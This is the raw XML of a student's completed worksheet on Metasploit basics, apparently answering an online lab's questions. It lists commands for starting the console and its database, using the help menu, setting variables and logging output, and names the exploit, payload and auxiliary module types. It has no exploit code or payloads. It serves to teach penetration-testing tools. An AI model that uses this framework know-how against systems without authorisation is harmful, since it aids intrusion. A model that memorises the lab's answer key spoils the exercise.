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9BF68" w14:textId="41365CF0" w:rsidR="00F21439" w:rsidRDefault="00F21439" w:rsidP="00F01BCF">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SALLY OKETCH.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EED279" w14:textId="1F5CE9E5" w:rsidR="00B57EF7" w:rsidRPr="006F1554" w:rsidRDefault="00F21439" w:rsidP="00F01BCF">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="004E757C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>Sally.oketch@womentechsters.org</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="24BE2936" w14:textId="7E4A9494" w:rsidR="00B57EF7" w:rsidRDefault="00B57EF7" w:rsidP="00F01BCF">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Practical activity 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C313BCE" w14:textId="5B32DD6E" w:rsidR="00C47B94" w:rsidRPr="00C47B94" w:rsidRDefault="00C47B94" w:rsidP="00F01BCF">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C47B94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635125FC" w14:textId="5C1DCCE7" w:rsidR="00B57EF7" w:rsidRPr="00C47B94" w:rsidRDefault="00B57EF7" w:rsidP="00F01BCF">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C47B94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Task </w:t>
      </w:r>
      <w:r w:rsidR="00C47B94" w:rsidRPr="00C47B94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00C47B94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2500DFDB" w14:textId="36364D81" w:rsidR="00B57EF7" w:rsidRPr="00BE7D07" w:rsidRDefault="00546BC1" w:rsidP="00F01BCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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First things first, we need to initialize the database! Let's do that now with the command</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE7D07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE7D07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>msfdb</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE7D07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE7D07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C482168" w14:textId="7D891FE3" w:rsidR="00BE7D07" w:rsidRPr="006F1554" w:rsidRDefault="00BE7D07" w:rsidP="00BE7D07">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02EF79A9" wp14:editId="17D9F855">
            <wp:extent cx="3848431" cy="2163920"/>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1038" cy="2176632"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7914193B" w14:textId="69D5612D" w:rsidR="00546BC1" w:rsidRPr="005E5B4D" w:rsidRDefault="00546BC1" w:rsidP="00F01BCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Before starting Metasploit, we can view some of the advanced options we can trigger for starting the console. Check these out now by using the command:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE7D07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>msfconsole -h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FDDF4D" w14:textId="26C32B0F" w:rsidR="005E5B4D" w:rsidRPr="006F1554" w:rsidRDefault="005E5B4D" w:rsidP="005E5B4D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56273DB3" wp14:editId="40C912A2">
            <wp:extent cx="4514669" cy="253853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31329" cy="2547905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6213AB" w14:textId="07EB43BE" w:rsidR="00546BC1" w:rsidRPr="006F1554" w:rsidRDefault="00546BC1" w:rsidP="00F01BCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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We can start the Metasploit console on the command line without showing the banner or any startup information as well. What switch do we add to msfconsole to start it without showing this information? This will include the</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE7D07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A55F0B" w14:textId="0C04BEE9" w:rsidR="00546BC1" w:rsidRPr="00E16139" w:rsidRDefault="00546BC1" w:rsidP="00F01BCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Once the database is initialized, go ahead and start Metasploit via the command:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E16139">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1C9D01" w14:textId="1521EFFE" w:rsidR="00E16139" w:rsidRPr="006F1554" w:rsidRDefault="00E16139" w:rsidP="00E16139">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006ED8F5" wp14:editId="73C7A855">
            <wp:extent cx="4020420" cy="2260627"/>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2549" cy="2267447"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="022A4BAE" w14:textId="4D91C6E1" w:rsidR="00546BC1" w:rsidRPr="00E16139" w:rsidRDefault="00546BC1" w:rsidP="00F01BCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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After Metasploit has started, let's go ahead and check that we've connected to the database. Do this now with the command</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C47B94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>db_status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C878545" w14:textId="5E28529A" w:rsidR="00E16139" w:rsidRPr="006F1554" w:rsidRDefault="00E16139" w:rsidP="00E16139">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3014C65A" wp14:editId="0AD8DD16">
            <wp:extent cx="3963856" cy="22288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4053" cy="2234556"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E784E1B" w14:textId="4D44314B" w:rsidR="00685DBF" w:rsidRPr="00685DBF" w:rsidRDefault="00546BC1" w:rsidP="00685DBF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Cool! We've connected to the database, which type of database does Metasploit 5 use? </w:t>
      </w:r>
      <w:r w:rsidRPr="00685DBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Postgresql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624BC022" w14:textId="77777777" w:rsidR="00546BC1" w:rsidRPr="006F1554" w:rsidRDefault="00546BC1" w:rsidP="00F01BCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1548F087" w14:textId="1AD1D08F" w:rsidR="00546BC1" w:rsidRPr="00685DBF" w:rsidRDefault="00546BC1" w:rsidP="00F01BCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00685DBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Task </w:t>
      </w:r>
      <w:r w:rsidR="00685DBF" w:rsidRPr="00685DBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00685DBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6048B8A3" w14:textId="7F624D23" w:rsidR="00546BC1" w:rsidRPr="00B31AB3"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Let's go ahead and start exploring the help menu. On the Metasploit prompt (where we'll be at after we start Metasploit using msfconsole), type the command:</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help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79363764" w14:textId="00F92D57" w:rsidR="00B31AB3" w:rsidRDefault="00B31AB3" w:rsidP="00B31AB3">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20D808DD" wp14:editId="7C3219E3">
            <wp:extent cx="4543639" cy="255482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1299" cy="2559133"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="724D0F69" w14:textId="2C60C9C5" w:rsidR="00E25E25" w:rsidRPr="006F1554" w:rsidRDefault="00E25E25" w:rsidP="00B31AB3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30FD060E" wp14:editId="482DB926">
            <wp:extent cx="4524292" cy="254394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9378" cy="2569299"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E111119" w14:textId="59DE813D"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The help menu has a very short one-character alias, what is it</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2707308E" w14:textId="1F223D5F"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Finding various modules we have at our disposal within Metasploit is one of the most common commands we will leverage in the framework. What is the base command we use for searching?</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Search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217E0D0B" w14:textId="4BB6938C"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Once we've found the module we want to leverage, what command we use to select it as the active module?</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Use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C8D152" w14:textId="64F53821"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How about if we want to view information about either a specific module or just the active one we have selected?</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Info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51862328" w14:textId="540E93DC"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Metasploit has a built-in netcat-like function where we can make a quick connection with a host simply to verify that we can 'talk' to it. What command is this?</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Connect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C997B8" w14:textId="3D725B3E"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Entirely one of the commands purely utilized for fun, what command displays the motd/ascii art we see when we start msfconsole (without -q flag)?</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Banner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD273B7" w14:textId="2AC2FA30"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We'll revisit these next two commands shortly, however, they're two of the most used commands within Metasploit. First, what command do we use to change the value of a variable?</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Set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24337D8C" w14:textId="6D5A9FC6"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Metasploit supports the use of global variables, something which is incredibly useful when you're specifically focusing on a single box. What command changes the value of a variable globally? </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Setg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A179A9A" w14:textId="29180237"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lastRenderedPageBreak/>
        <w:t>Now that we've learned how to change the value of variables, how do we view them? There are technically several answers to this question, however, I'm looking for a specific three-letter command which is used to view the value of single variables.</w:t>
      </w:r>
      <w:r w:rsidR="00B31AB3">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get</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46123A64" w14:textId="0C7F40CA"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How about changing the value of a variable to null/no value?</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Unset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31422D31" w14:textId="42B70DB7"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When performing a penetration test it's quite common to record your screen either for further review or for providing evidence of any actions taken. This is often coupled with the collection of console output to a file as it can be incredibly useful to grep for different pieces of information output to the screen. What command can we use to set our console output to save to a file?</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Spool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF1A4D6" w14:textId="2E81490B" w:rsidR="005D4CAE" w:rsidRPr="006F1554" w:rsidRDefault="005D4CAE" w:rsidP="00F01BCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Leaving a Metasploit console running isn't always convenient and it can be helpful to have all of our previously set values load when starting up Metasploit. What command can we use to store the settings/active datastores from Metasploit to a settings file? This will save within your msf4 (or msf5) directory and can be undone easily by simply removing the created settings file. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Save</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756CE606" w14:textId="0C46B009" w:rsidR="005D4CAE" w:rsidRPr="00E25E25" w:rsidRDefault="005D4CAE" w:rsidP="00F01BCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E25E25">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Task 4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDC019E" w14:textId="507F84A5" w:rsidR="005D4CAE" w:rsidRPr="006F1554" w:rsidRDefault="005D4CAE"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Easily the most common module utilized, which module holds all of the exploit code we will use?</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E16139">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73135F9A" w14:textId="0B6E1108" w:rsidR="005D4CAE" w:rsidRPr="006F1554" w:rsidRDefault="005D4CAE"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Used hand in hand with exploits, which module contains the various bits of shellcode we send to have executed following exploitation?</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E16139">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CB1937" w14:textId="2388112E" w:rsidR="005D4CAE" w:rsidRPr="006F1554" w:rsidRDefault="005D4CAE"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Which module is most commonly used in scanning and verification machines are exploitable? This is not the same as the actual exploitation of course.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E16139">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Auxiliary</w:t>
      </w:r>
    </w:p>
